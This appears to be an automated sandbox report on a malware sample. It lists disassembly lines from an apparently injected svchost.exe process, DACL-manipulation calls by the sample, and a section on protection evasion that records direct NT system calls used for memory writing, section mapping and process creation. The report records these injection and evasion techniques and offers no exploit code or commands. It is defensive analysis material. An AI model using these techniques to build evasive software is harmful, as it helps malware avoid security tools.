                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]2_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]2_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]2_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]2_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]2_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]2_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]2_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]2_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]2_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]2_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]2_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]2_2_03728B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]2_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]2_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]2_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]2_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]2_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]2_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]2_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]2_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]2_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]2_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]2_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]2_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]2_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]2_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730BCD mov eax, dword ptr fs:[00000030h]2_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740BBE mov eax, dword ptr fs:[00000030h]2_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E4BB0 mov eax, dword ptr fs:[00000030h]2_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03802B57 mov eax, dword ptr fs:[00000030h]2_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804A80 mov eax, dword ptr fs:[00000030h]2_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037ACA72 mov eax, dword ptr fs:[00000030h]2_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA6F mov eax, dword ptr fs:[00000030h]2_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DEA60 mov eax, dword ptr fs:[00000030h]2_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736A50 mov eax, dword ptr fs:[00000030h]2_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740A5B mov eax, dword ptr fs:[00000030h]2_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03754A35 mov eax, dword ptr fs:[00000030h]2_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA38 mov eax, dword ptr fs:[00000030h]2_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376CA24 mov eax, dword ptr fs:[00000030h]2_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375EA2E mov eax, dword ptr fs:[00000030h]2_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BCA11 mov eax, dword ptr fs:[00000030h]2_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376AAEE mov eax, dword ptr fs:[00000030h]2_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730AD0 mov eax, dword ptr fs:[00000030h]2_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764AD0 mov eax, dword ptr fs:[00000030h]2_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786ACC mov eax, dword ptr fs:[00000030h]2_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738AA0 mov eax, dword ptr fs:[00000030h]2_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03786AA4 mov eax, dword ptr fs:[00000030h]2_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768A90 mov edx, dword ptr fs:[00000030h]2_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h]2_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373EA80 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03756962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03728918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03804940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03760854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03734859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03742840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03752835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0038A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003781AC SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00378189 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtProtectVirtualMemory: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtTerminateThread: Direct from: 0x77762FCC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe | NtOpenKeyEx: Direct from: 0x77762B9C
